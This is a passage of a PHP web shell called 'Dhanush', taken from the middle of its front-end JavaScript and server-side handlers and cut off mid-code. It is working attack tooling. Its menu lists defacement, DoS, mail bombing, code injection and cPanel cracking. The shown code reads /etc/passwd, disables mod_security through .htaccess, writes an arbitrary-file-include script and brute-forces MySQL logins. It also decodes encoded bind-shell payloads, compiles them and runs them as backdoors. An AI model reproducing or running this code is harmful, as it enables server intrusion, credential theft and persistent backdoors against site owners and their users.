5931 ajaxRequest.onreadystatechange = function()
5932 {
5933 if(ajaxRequest.readyState == 4)
5934 {
5935 document.getElementById("showzone").innerHTML=ajaxRequest.responseText;
5936 }
5937 }
5938
5939 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5940 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5941 ajaxRequest.send(params);
5942 }
5943 function savemyfile(file,content)
5944 {
5945 var content = encodeURIComponent(content);
5946 var params = "content="+content+"&file="+file;
5947 document.getElementById("showmydata").innerHTML=waitstate;
5948 document.getElementById("showdir").innerHTML="";
5949 var ajaxRequest;
5950 ajaxRequest = new XMLHttpRequest();
5951
5952 ajaxRequest.onreadystatechange = function()
5953 {
5954 if(ajaxRequest.readyState == 4)
5955 {
5956 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5957 }
5958 }
5959
5960 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
5961 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
5962 ajaxRequest.send(params);
5963 }
5964 function renamefun(file,to)
5965 {
5966 document.getElementById("showmydata").innerHTML=waitstate;
5967 var ajaxRequest;
5968 ajaxRequest = new XMLHttpRequest();
5969
5970 ajaxRequest.onreadystatechange = function()
5971 {
5972 if(ajaxRequest.readyState == 4)
5973 {
5974 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5975 }
5976 }
5977
5978 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?renamemyfile&file="+file+"&to="+to, true);
5979 ajaxRequest.send(null);
5980 }
5981 function changeperms(chmode,myfilename)
5982 {
5983 document.getElementById("showmydata").innerHTML=waitstate;
5984 var ajaxRequest;
5985 ajaxRequest = new XMLHttpRequest();
5986
5987 ajaxRequest.onreadystatechange = function()
5988 {
5989 if(ajaxRequest.readyState == 4)
5990 {
5991 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
5992 }
5993 }
5994
5995 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?chmode="+chmode+"&myfilename="+myfilename, true);
5996 ajaxRequest.send(null);
5997 }
5998 function cancel()
5999 {
6000 document.getElementById("showmydata").className = "";
6001 document.getElementById("showmydata").innerHTML='';
6002 }
6003 function fileaction(myaction,myfilepath)
6004 {
6005 document.getElementById("showmydata").className = "fixedbox";
6006 document.getElementById("showmydata").innerHTML=waitstate;
6007 var ajaxRequest;
6008 ajaxRequest = new XMLHttpRequest();
6009
6010 ajaxRequest.onreadystatechange = function()
6011 {
6012 if(ajaxRequest.readyState == 4)
6013 {
6014 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6015 }
6016 }
6017
6018 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+myaction+"&myfilepath="+myfilepath, true);
6019 ajaxRequest.send(null);
6020 }
6021 function defacefun(deface)
6022 {
6023 var ajaxRequest;
6024 ajaxRequest = new XMLHttpRequest();
6025
6026 ajaxRequest.onreadystatechange = function()
6027 {
6028 if(ajaxRequest.readyState == 4)
6029 {
6030 alert(ajaxRequest.responseText);
6031 }
6032 }
6033
6034 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?deface="+deface, true);
6035 ajaxRequest.send(null);
6036 }
6037 function bypassfun(funct,functvalue,optiontype)
6038 {
6039 document.getElementById("showmydata").className = "fixedbox";
6040 document.getElementById("showmydata").innerHTML=waitstate;
6041 var ajaxRequest;
6042 ajaxRequest = new XMLHttpRequest();
6043
6044 ajaxRequest.onreadystatechange = function()
6045 {
6046 if(ajaxRequest.readyState == 3)
6047 {
6048 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6049 }
6050 }
6051
6052 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?bypassit&"+funct+"="+functvalue+"&optiontype="+optiontype, true);
6053 ajaxRequest.send(null);
6054 }
6055 function dos(target,ip,port,timeout,exTime,no0fBytes,multiplier)
6056 {
6057 document.getElementById("showdos").innerHTML=waitstate;
6058 var ajaxRequest;
6059 ajaxRequest = new XMLHttpRequest();
6060
6061 ajaxRequest.onreadystatechange = function()
6062 {
6063 if(ajaxRequest.readyState == 4)
6064 {
6065 document.getElementById("showdos").innerHTML=ajaxRequest.responseText;
6066 }
6067 }
6068
6069 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+target+"&ip="+ip+"&port="+port+"&timeout="+timeout+"&exTime="+exTime+"&no0fBytes="+no0fBytes+"&multiplier="+multiplier, true);
6070 ajaxRequest.send(null);
6071 }
6072 function createfile(filecreator,filecontent)
6073 {
6074 var mm = filecreator.slice(0, filecreator.lastIndexOf("<?php echo addslashes($directorysperator); ?>"));
6075 var filecontent = encodeURIComponent(filecontent);
6076 var params = "filecontent="+filecontent+"&filecreator="+filecreator;
6077 document.getElementById("showdir").innerHTML=waitstate;
6078 var ajaxRequest;
6079 ajaxRequest = new XMLHttpRequest();
6080
6081 ajaxRequest.onreadystatechange = function()
6082 {
6083 if(ajaxRequest.readyState == 4)
6084 {
6085 gethome('home',mm);
6086 document.getElementById("showdir").innerHTML=ajaxRequest.responseText;
6087 document.getElementById("showmydata").innerHTML="";
6088 }
6089 }
6090
6091 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6092 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6093 ajaxRequest.send(params);
6094 }
6095 function createdir(create,createfolder)
6096 {
6097 document.getElementById("showmydata").className = "fixedbox";
6098 document.getElementById("showmydata").innerHTML=waitstate;
6099 var ajaxRequest;
6100 ajaxRequest = new XMLHttpRequest();
6101
6102 ajaxRequest.onreadystatechange = function()
6103 {
6104 if(ajaxRequest.readyState == 4)
6105 {
6106 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6107 }
6108 }
6109
6110 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+create+"="+createfolder, true);
6111 ajaxRequest.send(null);
6112 }
6113 function codeinsert(code)
6114 {
6115 var code = encodeURIComponent(code);
6116 var params = "getcode="+code;
6117 document.getElementById("showcode").innerHTML=waitstate;
6118 var ajaxRequest;
6119 ajaxRequest = new XMLHttpRequest();
6120
6121 ajaxRequest.onreadystatechange = function()
6122 {
6123 if(ajaxRequest.readyState == 4)
6124 {
6125 document.getElementById("showcode").innerHTML=ajaxRequest.responseText;
6126 }
6127 }
6128
6129 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6130 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6131 ajaxRequest.send(params);
6132 }
6133 function getmydefacedata(mydata)
6134 {
6135 document.getElementById("showmydeface").innerHTML=waitstate;
6136 var ajaxRequest;
6137 ajaxRequest = new XMLHttpRequest();
6138
6139 ajaxRequest.onreadystatechange = function()
6140 {
6141 if(ajaxRequest.readyState == 4)
6142 {
6143 document.getElementById("showmydeface").innerHTML=ajaxRequest.responseText;
6144 }
6145 }
6146
6147 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
6148 ajaxRequest.send(null);
6149 }
6150 function getmydata(mydata)
6151 {
6152 document.getElementById("showmydata").className = "fixedbox";
6153 document.getElementById("showmydata").innerHTML=waitstate;
6154 var ajaxRequest;
6155 ajaxRequest = new XMLHttpRequest();
6156
6157 ajaxRequest.onreadystatechange = function()
6158 {
6159 if(ajaxRequest.readyState == 4)
6160 {
6161 document.getElementById("showmydata").innerHTML=ajaxRequest.responseText;
6162 }
6163 }
6164
6165 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata, true);
6166 ajaxRequest.send(null);
6167 }
6168 function getdata(mydata,myfile)
6169 {
6170 document.getElementById("showdata").innerHTML=waitstate;
6171 var ajaxRequest;
6172 ajaxRequest = new XMLHttpRequest();
6173
6174 ajaxRequest.onreadystatechange = function()
6175 {
6176 if(ajaxRequest.readyState == 3)
6177 {
6178 document.getElementById("showdata").innerHTML=ajaxRequest.responseText;
6179 }
6180 }
6181
6182 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+mydata+"&myfile="+myfile, true);
6183 ajaxRequest.send(null);
6184 }
6185 function getport(host,protocol)
6186 {
6187 document.getElementById("showports").innerHTML=waitstate;
6188 var ajaxRequest;
6189 ajaxRequest = new XMLHttpRequest();
6190
6191 ajaxRequest.onreadystatechange = function()
6192 {
6193 if(ajaxRequest.readyState == 4)
6194 {
6195 document.getElementById("showports").innerHTML=ajaxRequest.responseText;
6196 }
6197 }
6198
6199 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?host=" + host + "&protocol=" + protocol, true);
6200 ajaxRequest.send(null);
6201 }
6202 function changeforumpassword(forumpass,f1,f2,f3,f4,forums,tableprefix,ipbuid,newipbpass,username,newjoomlapass,uname,newpass)
6203 {
6204 document.getElementById("showchangepass").innerHTML=waitstate;
6205 var ajaxRequest;
6206 ajaxRequest = new XMLHttpRequest();
6207
6208 ajaxRequest.onreadystatechange = function()
6209 {
6210 if(ajaxRequest.readyState == 4)
6211 {
6212 document.getElementById("showchangepass").innerHTML=ajaxRequest.responseText;
6213 }
6214 }
6215
6216 ajaxRequest.open("GET", "<?php echo $_SERVER['PHP_SELF']; ?>?forumpass&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&forums=" + forums + "&prefix=" + tableprefix + "&ipbuid=" + ipbuid + "&newipbpass=" + newipbpass + "&username=" + username + "&newjoomlapass=" + newjoomlapass + "&uname=" + uname + "&newpass=" + newpass, true);
6217 ajaxRequest.send(null);
6218 }
6219 function forumdefacefn(index,f1,f2,f3,f4,defaceforum,tableprefix,siteurl,head,f5)
6220 {
6221 var index = encodeURIComponent(index);
6222 var params = "forumdeface="+defaceforum+"&index=" + index + "&f1=" + f1 + "&f2=" + f2 + "&f3=" + f3 + "&f4=" + f4 + "&tableprefix="+tableprefix+"&siteurl="+siteurl+"&head="+head+"&f5="+f5;
6223 document.getElementById("showdeface").innerHTML=waitstate;
6224 var ajaxRequest;
6225 ajaxRequest = new XMLHttpRequest();
6226
6227 ajaxRequest.onreadystatechange = function()
6228 {
6229 if(ajaxRequest.readyState == 4)
6230 {
6231 document.getElementById("showdeface").innerHTML=ajaxRequest.responseText;
6232 }
6233 }
6234
6235 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6236 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6237 ajaxRequest.send(params);
6238 }
6239 function codeinjector(pathtomass,mode,filetype,injectthis)
6240 {
6241 var injectthis = encodeURIComponent(injectthis);
6242 var params = "pathtomass="+pathtomass+"&mode=" + mode + "&filetype=" + filetype + "&injectthis=" + injectthis;
6243 document.getElementById("showinject").innerHTML=waitstate;
6244 var ajaxRequest;
6245 ajaxRequest = new XMLHttpRequest();
6246
6247 ajaxRequest.onreadystatechange = function()
6248 {
6249 if(ajaxRequest.readyState == 3)
6250 {
6251 document.getElementById("showinject").innerHTML=ajaxRequest.responseText;
6252 }
6253 }
6254
6255 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6256 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6257 ajaxRequest.send(params);
6258 }
6259 function sendmail(mailfunction,to,subject,message,from,times,padding)
6260 {
6261 var message = encodeURIComponent(message);
6262 if(mailfunction == "massmailing")
6263 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"&from=" + from + "&message=" + message;
6264 else if(mailfunction == "dobombing")
6265 var params = "mailfunction="+mailfunction+"&to="+to+"&subject="+subject+"×=" + times + "&padding=" + padding + "&message=" + message;
6266 document.getElementById("showmail").innerHTML=waitstate;
6267 var ajaxRequest;
6268 ajaxRequest = new XMLHttpRequest();
6269
6270 ajaxRequest.onreadystatechange = function()
6271 {
6272 if(ajaxRequest.readyState == 4)
6273 {
6274 document.getElementById("showmail").innerHTML=ajaxRequest.responseText;
6275 }
6276 }
6277
6278 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6279 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6280 ajaxRequest.send(params);
6281 }
6282 function execode(code)
6283 {
6284 var intext = document.getElementById('intext').checked;
6285 var message = encodeURIComponent(message);
6286 var params = "code="+code+"&intext="+intext;
6287 document.getElementById("showresult").innerHTML=waitstate;
6288 var ajaxRequest;
6289 ajaxRequest = new XMLHttpRequest();
6290
6291 ajaxRequest.onreadystatechange = function()
6292 {
6293 if(ajaxRequest.readyState == 4)
6294 {
6295 document.getElementById("showresult").innerHTML=ajaxRequest.responseText;
6296 }
6297 }
6298
6299 ajaxRequest.open("POST", "<?php echo $_SERVER["PHP_SELF"]; ?>", true);
6300 ajaxRequest.setRequestHeader("Content-type", "application/x-www-form-urlencoded")
6301 ajaxRequest.send(params);
6302 }
6303 function malwarefun(malwork)
6304 {
6305 var malpath = document.getElementById('createfile').value;
6306 document.getElementById("showmal").innerHTML=waitstate;
6307 var ajaxRequest;
6308 ajaxRequest = new XMLHttpRequest();
6309
6310 ajaxRequest.onreadystatechange = function()
6311 {
6312 if(ajaxRequest.readyState == 4)
6313 {
6314 document.getElementById("showmal").innerHTML=ajaxRequest.responseText;
6315 }
6316 }
6317
6318 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?"+malwork+"&path="+malpath, true);
6319 ajaxRequest.send(null);
6320 }
6321 function getexploit(wurl,path,functiontype)
6322 {
6323 document.getElementById("showexp").innerHTML=waitstate;
6324 var ajaxRequest;
6325 ajaxRequest = new XMLHttpRequest();
6326
6327 ajaxRequest.onreadystatechange = function()
6328 {
6329 if(ajaxRequest.readyState == 4)
6330 {
6331 document.getElementById("showexp").innerHTML=ajaxRequest.responseText;
6332 }
6333 }
6334
6335 ajaxRequest.open("GET", "<?php echo $_SERVER["PHP_SELF"]; ?>?uploadurl&wurl="+wurl+"&functiontype="+functiontype+"&path="+path, true);
6336 ajaxRequest.send(null);
6337 }
6338 function showMsg(msg)
6339 {
6340 if(msg == 'smf')
6341 {
6342 document.getElementById('tableprefix').value="smf_";
6343 document.getElementById('fid').style.display='block';
6344 document.getElementById('wpress').style.display='none';
6345 document.getElementById('joomla').style.display='none';
6346 }
6347 if(msg == 'mybb')
6348 {
6349 document.getElementById('tableprefix').value="mybb_";
6350 document.getElementById('wpress').style.display='none';
6351 document.getElementById('joomla').style.display='none';
6352 document.getElementById('fid').style.display='block';
6353 }
6354 if(msg == 'ipb' || msg == 'vb')
6355 {
6356 document.getElementById('tableprefix').value="";
6357 document.getElementById('wpress').style.display='none';
6358 document.getElementById('joomla').style.display='none';
6359 document.getElementById('fid').style.display='block';
6360 }
6361 if(msg == 'wp')
6362 {
6363 document.getElementById('tableprefix').value="wp_";
6364 document.getElementById('wpress').style.display='block';
6365 document.getElementById('fid').style.display='none';
6366 document.getElementById('joomla').style.display='none';
6367 }
6368 if(msg == 'joomla')
6369 {
6370 document.getElementById('joomla').style.display='block';
6371 document.getElementById('tableprefix').value="jos_";
6372 document.getElementById('wpress').style.display='none';
6373 document.getElementById('fid').style.display='none';
6374 }
6375 }
6376 function checkforum(msg)
6377 {
6378 if(msg == 'smf')
6379 {
6380 document.getElementById('tableprefix').value="smf_";
6381 document.getElementById('smfipb').style.display='block';
6382 document.getElementById('myjoomla').style.display='none';
6383 }
6384 if(msg == 'phpbb')
6385 {
6386 document.getElementById('tableprefix').value="phpb_";
6387 document.getElementById('myjoomla').style.display='none';
6388 document.getElementById('smfipb').style.display='block';
6389 }
6390 if(msg == 'mybb')
6391 {
6392 document.getElementById('tableprefix').value="mybb_";
6393 document.getElementById('myjoomla').style.display='none';
6394 document.getElementById('smfipb').style.display='none';
6395 }
6396 if(msg == 'vb')
6397 {
6398 document.getElementById('tableprefix').value="";
6399 document.getElementById('myjoomla').style.display='none';
6400 document.getElementById('smfipb').style.display='none';
6401 }
6402 if(msg == 'ipb')
6403 {
6404 document.getElementById('myjoomla').style.display='none';
6405 document.getElementById('smfipb').style.display='block';
6406 document.getElementById('tableprefix').value="";
6407 }
6408 if(msg == 'wp')
6409 {
6410 document.getElementById('tableprefix').value="wp_";
6411 document.getElementById('myjoomla').style.display='block';
6412 document.getElementById('smfipb').style.display='none';
6413 document.getElementById('siteurl').value="http://site/blog";
6414 }
6415 if(msg == 'joomla')
6416 {
6417 document.getElementById('myjoomla').style.display='block';
6418 document.getElementById('tableprefix').value="jos_";
6419 document.getElementById('smfipb').style.display='none';
6420 document.getElementById('siteurl').value="http://site/administrator/";
6421 }
6422 }
6423 </script>
6424 <body>
6425 <?php
6426 echo $shellstyle;
6427 ?>
6428 <div align="center">
6429 <a href="<?php $_SERVER['PHP_SELF'];?>"><span class=headtitle><font face="Times New Roman, Times, serif" size="6">Dhanush: By Arjun</font></span></a>
6430
6431 </div>
6432 <hr color="#1B1B1B">
6433
6434 <table cellpadding="0" style="width:100%;">
6435 <tr>
6436 <td colspan="2" style="width:85%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
6437 <td style="width:7%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
6438 <td style="width:8%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
6439 </tr>
6440
6441 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
6442 <td style="width:85%;" colspan="2">Uid : <font class="txt"><?php if(shell_exec("id")){echo shell_exec("id");}else{echo "user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid();} ?></font></td>
6443 <?php $d0mains = @file("/etc/named.conf");
6444 $users=@file('/etc/passwd');
6445 if($d0mains)
6446 {
6447 $count;
6448 foreach($d0mains as $d0main)
6449 {
6450 if(@ereg("zone",$d0main))
6451 {
6452 preg_match_all('#zone "(.*)"#', $d0main, $domains);
6453 flush();
6454 if(strlen(trim($domains[1][0])) > 2){
6455 flush();
6456 $count++;
6457 }
6458 }
6459 }
6460 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
6461 }
6462 else if($users)
6463 {
6464 $file = fopen("/etc/passwd", "r");
6465 while(!feof($file))
6466 {
6467 $s = fgets($file);
6468 $matches = array();
6469 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
6470 $matches = str_replace("home/","",$matches[1]);
6471 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
6472 continue;
6473 $count++;
6474 }
6475 ?><td style="width:7%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
6476 <?php if($os == "Linux") { ?><td style="width:8%;vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>"><font class="txt">Download It</font></a></td><?php } ?>
6477 </tr><?php } ?>
6478 <tr>
6479 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); ?> of <?php echo HumanReadableFilesize(diskSpace()); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
6480 <td style="width:20%;vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
6481
6482 <td style="width:20%;">Server IP : <a href="http://whois.domaintools.com/<?php serverip(); ?>"><font class="txt"><?php serverip(); ?></font></a></td>
6483 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><font class="txt"><?php yourip(); ?></font></a></td>
6484 </tr>
6485
6486 <tr>
6487 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font><?php } ?>
6488 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900"><?php
6489 $d = str_replace("\",$directorysperator,$dir);
6490 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
6491 $d = str_replace("\","\",$d);
6492 $dispd = htmlspecialchars($d);
6493 $pd = $e = explode($directorysperator,substr($d,0,-1));
6494 $i = 0;
6495 foreach($pd as $b)
6496 {
6497 $t = '';
6498 $j = 0;
6499 foreach ($e as $r)
6500 {
6501 $t.= $r.$directorysperator;
6502 if ($j == $i) {break;}
6503 $j++;
6504 }
6505 $href=addslashes($t);
6506
6507 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
6508 $i++;
6509 }
6510
6511 ?></font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
6512 <td colspan=3 style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
6513 </tr>
6514 </table>
6515
6516
6517 <?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
6518 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
6519 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
6520 <tr>";
6521 $menu = '';
6522 foreach($m1 as $k => $v)
6523 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
6524 echo $menu;
6525 echo "</tr>
6526 </table>
6527 <div style=\"float:left;\">
6528 <a href=\"javascript:history.back(1)\"><font class=txt size=3> [Back] </font></a>
6529 <a href=\"javascript:history.go(1)\"><font class=txt size=3> [Forward] </font></a>
6530 <a href=\"\"><font class=txt size=3> [Refresh] </font></a></div>
6531 <table style=\"margin-left:270px; border-color:#333333;\" border=2 width=60%; cellpadding=2>
6532 <tr align=center>";
6533 foreach($m2 as $k => $v)
6534 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
6535 echo $menu1;
6536 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('Are You Sure You Want To Kill This Shell ?')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[SelfKill]</font></a></td>
6537 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
6538 </tr>
6539 </table>";?>
6540
6541 <div id="showmaindata"></div>
6542 <center><div id="showmydata"></div></center>
6543 <?php
6544 if(isset($_GET["downloadit"]))
6545 {
6546 $FolderToCompress = getcwd();
6547 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
6548
6549
6550 $prd=explode("/","backup.tar");
6551 for($i=0;$i<sizeof($prd);$i++)
6552 {
6553 $nfd=$prd[$i];
6554 }
6555 @ob_clean();
6556 header("Content-type: application/octet-stream");
6557 header("Content-length: ".filesize($nfd));
6558 header("Content-disposition: attachment; filename=\"".$nfd."\";");
6559 readfile($nfd);
6560 exit;
6561 }
6562 //Turn Safe Mode Off
6563
6564 if(getDisabledFunctions() != "None" || safe() != "OFF")
6565 {
6566 $file_pointer = fopen(".htaccess", "w+");
6567 fwrite($file_pointer, "<IfModule mod_security.c>
6568 SecFilterEngine Off
6569 SecFilterScanPOST Off
6570 </IfModule>");
6571
6572 $file_pointer = fopen("ini.php", "w+");
6573 fwrite($file_pointer, "<?
6574 echo ini_get(\"safe_mode\");
6575 echo ini_get(\"open_basedir\");
6576 include(\$_GET[\"file\"]);
6577 ini_restore(\"safe_mode\");
6578 ini_restore(\"open_basedir\");
6579
6580 echo ini_get(\"safe_mode\");
6581 echo ini_get(\"open_basedir\");
6582 include(\$_GET[\"ss\"]);
6583 ?>");
6584
6585 $file_pointer = fopen("php.ini", "w+");
6586 fwrite($file_pointer, "safe_mode = Off");
6587
6588 fclose($file_pointer);
6589 //echo "Safe Mode Is Now Off..";
6590 }
6591
6592 if(isset($_POST['cpanelattack']))
6593 {
6594 if(!empty($_POST['username']) && !empty($_POST['password']))
6595 {
6596 $userlist=explode("
6597 ",$_POST['username']);
6598 $passlist=explode("
6599 ",$_POST['password']);
6600
6601 $e = explode("
6602 ",$_POST['username']);
6603 foreach($e as $value)
6604 {
6605 $k = explode(":",$value);
6606 $username .= $k['0']." ";
6607 }
6608
6609 $a1 = explode(" ",$username);
6610 $a2 = explode("
6611 ",$_POST['password']);
6612 $id2 = count($a2);
6613 $ok = 0;
6614 foreach($a1 as $user)
6615 {
6616 if($user !== '')
6617 {
6618 $user=trim($user);
6619 for($i=0;$i<=$id2;$i++)
6620 {
6621 $pass = trim($a2[$i]);
6622 if(@mysql_connect('localhost',$user,$pass))
6623 {
6624 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
6625 $ok++;
6626 }
6627 }
6628 }
6629 }
6630 echo "<hr><b>You Found <font color=red>$ok</font></b>";
6631 }
6632 else
6633 $bdmessage = "<center>Please Enter The Users or Password List</center>";
6634 }
6635
6636 else if(isset($_GET['info']))
6637 {
6638 $bdmessage = "<br><div align=left>".nl2br(shell_exec("whois ".$_GET['info']))."</div>";
6639 }
6640
6641 else if(isset($_GET['viewdb']))
6642 {
6643 listdatabase();
6644 }
6645 else if(isset($_POST['u']))
6646 {
6647 $path = $_REQUEST['path'];
6648 if(is_dir($path))
6649 {
6650 $setuploadvalue = 0;
6651 $uploadedFilePath = $_FILES['uploadfile']['name'];
6652 $tempName = $_FILES['uploadfile']['tmp_name'];
6653 if($os == "Windows")
6654 $uploadPath = $path . $directorysperator . $uploadedFilePath;
6655 else if($os == "Linux")
6656 $uploadPath = $path . $directorysperator . $uploadedFilePath;
6657 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
6658 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
6659 else
6660 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
6661 }
6662 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
6663 }
6664 // View Passwd file
6665
6666 else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
6667 {
6668 $temp = "";
6669 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
6670 {
6671 $uid = @posix_getpwuid($_GET['val1']);
6672 if ($uid)
6673 $temp .= join(':',$uid)."
6674 ";
6675 }
6676 echo '<br/>';
6677 paramexe('Users', $temp);
6678 }
6679
6680 else if(isset($_POST['backdoor']))
6681 {
6682 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
6683 { ?><script type="text/javascript">gethome('connect');</script><?php
6684 $passwd = $_POST['passwd'];
6685 if($_POST['lang'] == 'c')
6686 {
6687 if(is_writable("."))
6688 {
6689 @$fh=fopen(getcwd()."/backp.c",'w');
6690 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
6691 @fclose($fh);
6692 execmd("chmod 0755 ".getcwd()."/backp.c");
6693 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
6694 execmd("chmod 0755 ".getcwd()."/backp");
6695 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
6696 $scan = exec_all("ps aux | grep backp".$_POST['port']);
6697 if(eregi("backp".$_POST['port'],$scan))
6698 $bdmessage = "Process found running, backdoor setup successfully.";
6699 else
6700 $bdmessage = "Process not found running, backdoor not setup successfully.";
6701 }
6702 else
6703 {
6704 @$fh=fopen("/tmp/backp.c","w");
6705 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
6706 @fclose($fh);
6707 execmd("chmod 0755 /tmp/backp.c");
6708 execmd("gcc -o /tmp/backp /tmp/backp.c");
6709 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
6710 $scan = exec_all("ps aux | grep backp".$_POST['port']);
6711 if(eregi("backp".$_POST['port'],$scan))
6712 $bdmessage = "Process found running, backdoor setup successfully.";
6713 else
6714 $bdmessage = "Process not found running, backdoor not setup successfully.";
6715 }
6716 }
6717 if($_POST['lang'] == 'perl')
6718 {
6719 if(is_writable("."))
6720 {
6721 @$fh=fopen(getcwd()."/bp.pl",'w');
6722 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
6723 @fclose($fh);
6724 execmd("chmod 0755 ".getcwd()."/bp.pl");
6725 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
6726 $bdmessage = "<pre>$out
6727 ".execmd("ps aux | grep bp.pl")."</pre>";
6728 }
6729 else
6730 {
6731 @$fh=fopen("/tmp/bp.pl","w");
6732 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
6733 @fclose($fh);
6734 execmd("chmod 0755 ".getcwd()."/bp.pl");
